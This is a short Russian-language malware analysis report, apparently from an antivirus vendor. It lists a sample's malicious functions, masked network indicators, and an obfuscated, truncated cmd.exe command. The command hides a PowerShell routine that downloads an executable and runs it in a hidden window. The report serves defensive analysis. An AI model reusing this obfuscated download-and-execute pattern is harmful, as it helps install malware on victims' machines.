Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:/C"s^e^t ^y^k=^ ^ ^ ^ }^}{hctac^}^;^k^a^er^b;^i^b^Q^$ metI-^e^k^ovn^I;)i^b^Q$ ,rvv$(e^li^F^d^ao^lnw^o^D^.M^w^H${^yr^t^{)uB^w$ n^i^ rvv^$(^hcaer^o^f;^'ex^e.'+RVE$^+'^\'^+cil^bup^...
Сетевая активность
Подключается к
- 'be####-systems.com':80
- 'go##enet.de':80
- 'go##enet.de':443
TCP
Запросы HTTP GET
- http://be####-systems.com/YwrYZbQFqE
- http://go##enet.de/QOkU4uQh
Другие
- 'go##enet.de':443
UDP
- DNS ASK kp######z.kienthucsong.info
- DNS ASK be####-systems.com
- DNS ASK go##enet.de
- DNS ASK la#######looringcapetown.com
- DNS ASK am##izi.it
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"s^e^t ^y^k=^ ^ ^ ^ }^}{hctac^}^;^k^a^er^b;^i^b^Q^$ metI-^e^k^ovn^I;)i^b^Q$ ,rvv$(e^li^F^d^ao^lnw^o^D^.M^w^H${^yr^t^{)uB^w$ n^i^ rvv^$(^hcaer^o^f;^'ex^e.'+RVE$^+'^\'^+cil^bup^...' (со скрытым окном)
